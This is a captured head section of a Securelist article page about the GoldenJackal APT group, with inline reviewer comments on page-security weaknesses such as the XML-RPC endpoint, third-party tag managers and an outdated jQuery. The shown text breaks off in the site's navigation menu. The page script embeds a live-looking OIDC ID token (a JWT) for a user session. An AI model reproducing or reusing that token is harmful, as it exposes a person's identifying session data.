<!DOCTYPE html> <html lang="en-US"> <head>
<!-- Head of the captured Securelist article page: document metadata, inline bootstrap scripts and third-party tag/SDK loaders. Review notes are given inline as HTML comments next to the element they concern. -->
<meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html;charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge">
<!-- Gravity Forms hook shim (inline, minified). doHook resolves a string "callable" through window[name], so hooks can be registered by global function name by any script on the page; as an inline script it also needs a CSP nonce/hash or 'unsafe-inline'. -->
<script type="text/javascript"> /* <![CDATA[ */ var gform;gform||(document.addEventListener("gform_main_scripts_loaded",function(){gform.scriptsLoaded=!0}),window.addEventListener("DOMContentLoaded",function(){gform.domLoaded=!0}),gform={domLoaded:!1,scriptsLoaded:!1,initializeOnLoaded:function(o){gform.domLoaded&&gform.scriptsLoaded?o():!gform.domLoaded&&gform.scriptsLoaded?window.addEventListener("DOMContentLoaded",o):document.addEventListener("gform_main_scripts_loaded",o)},hooks:{action:{},filter:{}},addAction:function(o,n,r,t){gform.addHook("action",o,n,r,t)},addFilter:function(o,n,r,t){gform.addHook("filter",o,n,r,t)},doAction:function(o){gform.doHook("action",o,arguments)},applyFilters:function(o){return gform.doHook("filter",o,arguments)},removeAction:function(o,n){gform.removeHook("action",o,n)},removeFilter:function(o,n,r){gform.removeHook("filter",o,n,r)},addHook:function(o,n,r,t,i){null==gform.hooks[o][n]&&(gform.hooks[o][n]=[]);var e=gform.hooks[o][n];null==i&&(i=n+"_"+e.length),gform.hooks[o][n].push({tag:i,callable:r,priority:t=null==t?10:t})},doHook:function(n,o,r){var t;if(r=Array.prototype.slice.call(r,1),null!=gform.hooks[n][o]&&((o=gform.hooks[n][o]).sort(function(o,n){return o.priority-n.priority}),o.forEach(function(o){"function"!=typeof(t=o.callable)&&(t=window[t]),"action"==n?t.apply(null,r):r[0]=t.apply(null,r)})),"filter"==n)return r[0]},removeHook:function(o,n,t,i){var r;null!=gform.hooks[o][n]&&(r=(r=gform.hooks[o][n]).filter(function(o,n,r){return!!(null!=i&&i!=o.tag||null!=t&&t!=o.priority)}),gform.hooks[o][n]=r)}}); /* ]]> */ </script>
<!-- rel="pingback" (and rel="EditURI" further down) advertise the WordPress XML-RPC endpoint; WordPress hardening guidance is to disable xmlrpc.php when pingbacks and remote publishing are not used. The http: rel="profile" URI is an identifier and is not fetched. -->
<link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="https://securelist.com/xmlrpc.php" /> <link 
rel="apple-touch-icon" sizes="192x192" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-192x192.png"> <link rel="icon" type="image/png" sizes="192x192" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-192x192.png"> <link rel="icon" type="image/png" sizes="96x96" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-96x96.png"> <link rel="icon" type="image/png" sizes="48x48" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-48x48.png"> <link rel="icon" type="image/png" sizes="32x32" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-16x16.png"> <link rel="manifest" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/site.webmanifest"> <title>GoldenJackal APT and its malicious toolset | Securelist</title> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <!-- The SEO Framework by Sybre Waaijer --> <meta name="keywords" content="APT,Backdoor,Cyber espionage,Data theft,GoldenJackal,Malware,Malware Descriptions,Malware Technologies,Microsoft Office,Targeted attacks" /> <link rel="canonical" href="https://securelist.com/goldenjackal-apt-group/109677/" /> <meta name="description" content="GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher." /> <meta property="og:type" content="article" /> <meta property="og:title" content="Meet the GoldenJackal APT group. 
Don’t expect any howls" /> <meta property="og:description" content="GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher." /> <meta property="og:url" content="https://securelist.com/goldenjackal-apt-group/109677/" /> <meta property="og:image" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200.jpg" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:site" content="@Securelist" /> <meta name="twitter:creator" content="@Securelist" /> <meta name="twitter:title" content="Meet the GoldenJackal APT group. Don’t expect any howls" /> <meta name="twitter:description" content="GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher." /> <meta name="twitter:image" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200.jpg" />
<!-- JSON-LD note: dateModified (2023-05-22T14:30:14Z) is earlier than datePublished (2023-05-23T08:00:02Z), consistent with a scheduled post edited before going live; confirm if the dates are consumed downstream. -->
<script type="application/ld+json">{"@context":"https://schema.org","@type":"NewsArticle","mainEntityOfPage":{"@type":"WebPage","@id":"https://securelist.com/goldenjackal-apt-group/109677/"},"headline":"Meet the GoldenJackal APT group. 
Don’t expect any howls","image":"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200.jpg","datePublished":"2023-05-23T08:00:02+00:00","dateModified":"2023-05-22T14:30:14+00:00","author":{"@type":"Person","name":"Giampaolo Dedola","url":"https://securelist.com/author/giampaolodedola/"},"publisher":{"@type":"Organization","name":"Kaspersky","logo":{"@type":"ImageObject","url":"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/06/04065705/article-logo-small_new.png","width":60,"height":60}},"description":"GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher."}</script> <!-- / The SEO Framework by Sybre Waaijer | 118.34ms meta | 0.14ms boot --> <link rel='dns-prefetch' href='//kasperskycontenthub.com' /> <link rel='dns-prefetch' href='//securelist.com' /> <link rel='dns-prefetch' href='//www.google.com' /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com » Feed" href="https://securelist.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com » Comments Feed" href="https://securelist.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com » Meet the GoldenJackal APT group. 
Don’t expect any howls Comments Feed" href="https://securelist.com/goldenjackal-apt-group/109677/feed/" />
<!-- Assets below come from a second origin over protocol-relative URLs (//assets.kasperskycontenthub.com); they inherit https from the page, but explicit https: is the usual recommendation. The bwp-minify endpoint concatenates whatever files f= names server-side; that endpoint must restrict f= to an allow-list of theme/plugin paths (not verifiable from the page). -->
<link rel='stylesheet' id='crayon-group-css' href='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/crayon-syntax-highlighter/css/min/crayon.min.css,wp-content/plugins/crayon-syntax-highlighter/themes/classic/classic.css,wp-content/plugins/crayon-syntax-highlighter/fonts/monaco.css,wp-includes/css/dist/block-library/style.min.css,wp-content/plugins/jquery-collapse-o-matic/css/core_style.css,wp-content/plugins/jquery-collapse-o-matic/css/light_style.css,wp-content/plugins/kspr_twitter_pullquote/css/style.css,wp-content/themes/securelist2020/assets/css/main.css,wp-content/plugins/kaspersky-social-sharing/assets/css/style.css,wp-content/plugins/kaspersky-social-sharing/assets/css/custom.css' type='text/css' media='all' /> <link rel='stylesheet' id='taxonomy-image-plugin-public-group-css' href='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/taxonomy-images/css/style.css' type='text/css' media='screen' />
<!-- jQuery 1.12.4 (WordPress build). The 1.x line has had no releases since 2016 and subsequent jQuery security fixes in the 3.x line were not backported; the "migrate helper" onerror handler further down suggests this is a deliberate compatibility fallback. Check the version against current advisories. -->
<script type="text/javascript" src="https://securelist.com/wp-content/plugins/kaspersky-enable-jquery-migrate-helper/js/jquery/jquery-1.12.4-wp.js?ver=1.12.4-wp" id="jquery-core-js"></script>
<!-- NOTE(review): kasperskySSOIntegrationData.endSessionURL embeds an id_token_hint whose value is a JWT (its header decodes to alg RS256; its payload is plain base64url JSON carrying subject, session id, issuer, audience and expiry claims). It appears to be the OIDC ID token of the session under which this copy was fetched, rendered into the page as a logout hint. An ID token in page markup is readable by every inline and third-party script on the page and is captured by caches, proxies and scrapers (as this copy shows); it is not an access token and its exp claim bounds it, but it is identifying data. Prefer building the end-session URL server-side at logout time. Separately, authorizationURL requests scope offline_access (a refresh token); confirm a long-lived grant is really needed for a site login. -->
<script type="text/javascript" id="kaspersky-sso-integration-js-extra"> /* <![CDATA[ */ var kasperskySSOIntegrationData = {"authorizationURL":"https:\/\/auth.ca.uis.kaspersky.com\/connect\/authorize?client_id=securelist&client_name=Securelist&redirect_uri=https%3A%2F%2Fsecurelist.com%2Fkaspersky-sso%2Flogin%2F&response_type=code&scope=openid email profile 
offline_access","endSessionURL":"https:\/\/auth.ca.uis.kaspersky.com\/connect\/endsession?id_token_hint=eyJhbGciOiJSUzI1NiIsImtpZCI6IkNCNzFGQTExMjc4MzgyMzQ3OTAxNzlENkJGMkVBNkFCRkZGOEQ5OUYiLCJ4NXQiOiJ5M0g2RVNlRGdqUjVBWG5Xdnk2bXFfXzQyWjgiLCJ0eXAiOiJKV1QifQ.eyJhdF9oYXNoIjoiRHM1QjM1LWppNGhIV0M5X0RzMXhXZyIsInNpZCI6IkdCRzdmU2FqMmVQeVBIRnZUV3JoUUEiLCJzdWIiOiI0MzRiNjMxZi05NTU2LTRhMTUtYjk5OS0yYTQxYThlZjJmYzMiLCJhdXRoX3RpbWUiOiIxNzM5NzcyMDMzIiwiaWRwIjoiS2FzcGVyc2t5SWQiLCJrYXNwZXJza3kuc3ViX3ZlcnNpb24iOiIxIiwia2FzcGVyc2t5LnN1c3BpY2lvdXNfYXV0aGVudGljYXRpb24iOiJ0cnVlIiwibmJmIjoxNzM5NzcyMDM4LCJleHAiOjE3Mzk4NTg0MzgsImlhdCI6MTczOTc3MjAzOCwiaXNzIjoiaHR0cHM6Ly9hdXRoLmNhLnVpcy5rYXNwZXJza3kuY29tIiwiYXVkIjoic2VjdXJlbGlzdCJ9.MoGupMHBmoByXheRiABobA4kLTdk8F1c365JGWSisHPFNT_kPZhmh6ggVSifsbSwVDnRLTl5q7zfcI7E7K3WoIj1t8ZAdVrT5JJg_fOgyz_WrJDmzjim6VS2PDVle8BdyqikRBOgQrTx42dWUII_0wO8MMb1nm84cRyjfBrQFHCXJ2zB29Jba90HoFchCXrgOwMFFSMX7JYKjQZTBMj5Xxpr5N9I-nVvFAAz1Aaeq8gKsiNSGds1YQZqmhdcAswoqrdjePpiiiVe7RfUo4NmsshiGAxQrW4oe3p8zUwk0Mlsyiv-K3wRyCfHAno0XmZycB7gyzu12J1qOs2MnmGBRg&post_logout_redirect_uri=https:\/\/securelist.com\/kaspersky-sso\/logout\/"}; /* ]]> */ </script> <script type="text/javascript" id="kss_js-js-extra"> /* <![CDATA[ */ var kss = {"twitter_account":"Securelist"}; /* ]]> */ </script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/kaspersky-lazy-load/assets/js/lazyload.js,wp-content/plugins/kaspersky-sso-integration/assets/js/main.js,wp-content/plugins/kspr_twitter_pullquote/js/kaspersky-twitter-pullquote.js,wp-content/plugins/kaspersky-social-sharing/assets/js/social-share.js'></script> <link rel="alternate" hreflang="x-default" href="https://securelist.com/goldenjackal-apt-group/109677/" />
<!-- Two Google Tag Manager containers are loaded (GTM-5CGZ3HG and GTM-WZ7LJ3, each repeated as a noscript iframe at the top of body). A GTM container can inject arbitrary script chosen in the GTM console, so console access on either container is effectively page-script access; the two inline loader snippets are identical apart from the id. -->
<script> window.dataLayer = window.dataLayer || []; window.dataLayer.push({ 'Author' : 'Giampaolo Dedola', 'PostId' : '109677', 'PublicationDate' : '2023-05-23', 'Categories': 'APT reports', 'Tags': '.NET, APT, 
Backdoor, Cyber espionage, Data theft, GoldenJackal, Malware, Malware Descriptions, Malware Technologies, Targeted attacks', }); </script> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-5CGZ3HG');</script> <!-- End Google Tag Manager --> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-WZ7LJ3');</script> <!-- End Google Tag Manager --> <link rel="https://api.w.org/" href="https://securelist.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://securelist.com/wp-json/wp/v2/posts/109677" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://securelist.com/xmlrpc.php?rsd" /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://securelist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurelist.com%2Fgoldenjackal-apt-group%2F109677%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://securelist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurelist.com%2Fgoldenjackal-apt-group%2F109677%2F&format=xml" />
<!-- Loads a further script from kasperskycontenthub.com, passing the current page URL in back=. The missing semicolon after the sNew.src assignment is repaired by automatic semicolon insertion but is a lint finding. -->
<script type="text/javascript"> var sNew = document.createElement("script"); sNew.async = true; sNew.src = "https://kasperskycontenthub.com/?dm=ed1f9e435dc885292eab65620c51f3fb&action=load&blogid=43&siteid=1&t=258702009&back=https%3A%2F%2Fsecurelist.com%2Fgoldenjackal-apt-group%2F109677%2F" var s0 = 
document.getElementsByTagName('script')[0]; s0.parentNode.insertBefore(sNew, s0); </script>
<!-- Marketo Munchkin is injected with document.write(unescape(...)) over a protocol-relative URL: document.write is parser-blocking, some browsers refuse document.write-inserted cross-origin scripts on slow connections, and it cannot be permitted under a strict CSP. The synchronous insertion is what lets the next inline script call Munchkin.init() immediately; an async <script> element with an onload-driven init is the usual replacement. -->
<script type="text/javascript"> document.write(unescape("%3Cscript src='//munchkin.marketo.net/munchkin.js' type='text/javascript'%3E%3C/script%3E")); </script> <script>Munchkin.init('802-IJN-240');</script> <meta name="google-site-verification" content="o48MojucKcP-DT5iCMR8AsvkVWP14fE78flHCqqjo50" />
<!-- WordPress jQuery Migrate Helper. window.onerror looks for "X is not a function" where X is a removed jQuery 1.x API, then POSTs a nonce-protected admin-ajax request asking the site to downgrade jQuery and reloads if the server agrees. Side effects worth knowing: the handler returns true on every path, so every uncaught error on the page is suppressed from default console reporting; the inline _wpnonce is a CSRF token bound to this one action, not a secret. In this captured copy the original line comments had been collapsed onto one line, where each "//" would swallow the code after it; they are written as block comments here so the script parses. -->
<script type="text/javascript"> var jQueryMigrateHelperHasSentDowngrade = false;
window.onerror = function( msg, url, line, col, error ) {
/* Break out early, do not process if a downgrade request was already sent. */
if ( jQueryMigrateHelperHasSentDowngrade ) { return true; }
var xhr = new XMLHttpRequest(); var nonce = 'c380f08d63';
var jQueryFunctions = [ 'andSelf', 'browser', 'live', 'boxModel', 'support.boxModel', 'size', 'swap', 'clean', 'sub', ];
var match_pattern = /\)\.(.+?) is not a function/; var erroredFunction = msg.match( match_pattern );
/* If there was no matching function, do not try to downgrade.
   NOTE(review): String.prototype.match returns null on no match and typeof null is 'object', so the first operand does not
   catch that case and erroredFunction[1] is evaluated on null, throwing inside the error handler; an explicit null check
   before the typeof test would close that gap. */
if ( typeof erroredFunction !== 'object' || typeof erroredFunction[1] === "undefined" || -1 === jQueryFunctions.indexOf( erroredFunction[1] ) ) { return true; }
/* Set that we've now attempted a downgrade request. */
jQueryMigrateHelperHasSentDowngrade = true;
xhr.open( 'POST', 'https://securelist.com/wp-admin/admin-ajax.php' ); xhr.setRequestHeader( 'Content-Type', 'application/x-www-form-urlencoded' );
xhr.onload = function () { var response, reload = false; if ( 200 === xhr.status ) { try { response = JSON.parse( xhr.response ); reload = response.data.reload; } catch ( e ) { reload = false; } }
/* Automatically reload the page if a deprecation caused an automatic downgrade, ensure visitors get the best possible experience. */
if ( reload ) { location.reload(); } };
xhr.send( encodeURI( 'action=jquery-migrate-downgrade-version&_wpnonce=' + nonce ) );
/* Suppress error alerts in older browsers */
return true; } </script>
<!-- Markup defect: a <div> is not allowed in <head>. An HTML parser implicitly closes the head at <div id="fb-root">, so the icon <link>s, the <meta>, the </head> and the <body class="..."> below are parsed in body context (the body attributes are merged onto the implied body, which is why the page still renders). Move #fb-root and the two SDK loaders into <body>. The Facebook SDK (legacy all.js entry point, with the site appId) and Google platform.js are loaded over protocol-relative URLs from third-party origins; self-updating SDKs cannot carry SRI, so they are trusted as page script. -->
<div id="fb-root"></div> <script> (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=160639043985664"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <script> (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = '//apis.google.com/js/platform.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })(); </script> <link rel="icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-32x32.png" sizes="32x32" /> <link rel="icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-180x180.png" /> <meta name="msapplication-TileImage" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-270x270.png" /> </head> <body class="post-template-default single single-post postid-109677 single-format-standard lang-en_US c-theme--light"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5CGZ3HG" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WZ7LJ3" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) -->
href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/endpoint-detection-and-response.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>EDR Expert</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-hybrid-cloud-security_products menu-item menu-item-type-custom menu-item-object-custom menu-item-87730"><figure><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/hybrid-cloud-security_products.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>EDR Optimum</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-anti-targeted-attack-platform menu-item menu-item-type-custom 
menu-item-object-custom menu-item-87731"><figure><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/anti-targeted-attack-platform.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Anti Targeted Attack Platform</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112325"><a href="https://www.kaspersky.com/enterprise-security/cloud-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Hybrid Cloud Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/cloud-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112326"><a href="https://www.kaspersky.com/enterprise-security/sd-wan?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>SD-WAN</a><div class="desc"><p><a 
href="https://www.kaspersky.com/enterprise-security/sd-wan?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-private-security-network menu-item menu-item-type-custom menu-item-object-custom menu-item-87732"><figure><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/private-security-network.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Industrial CyberSecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-embedded-systems-security menu-item menu-item-type-custom menu-item-object-custom menu-item-87733"><figure><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/embedded-systems-security.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Container Security</a><div class="desc"><p><a 
href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Products</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112328"><a href="https://www.kaspersky.com/enterprise-security/products/internet-gateway?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Security for Internet Gateway</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112329"><a href="https://www.kaspersky.com/enterprise-security/embedded-systems?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Embedded Systems Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112330"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-iot-infrastructure-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky IoT Infrastructure Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112331"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-secure-remote-workspace?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Secure Remote Workspace</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112332"><a href="https://www.kaspersky.com/enterprise-security/mail-server-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Security for Mail Server</a> <li class="menu-item 
menu-item-type-custom menu-item-object-custom menu-item-87740"><a target="_blank" href="https://www.kaspersky.com/enterprise-security/products?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View All</a> </ul> </ul> <li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87741"><a href="https://www.kaspersky.com/enterprise-security/services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Services</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87742"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item icon-cybersecurity-services menu-item menu-item-type-custom menu-item-object-custom menu-item-87743"><figure><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/cybersecurity-services.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Cybersecurity Services</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-105619"><a 
href="https://www.kaspersky.com/enterprise-security/security-awareness?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Security Awareness</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/security-awareness?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-premium-support menu-item menu-item-type-custom menu-item-object-custom menu-item-87745"><figure><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/premium-support.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Premium Support</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-intelligence menu-item 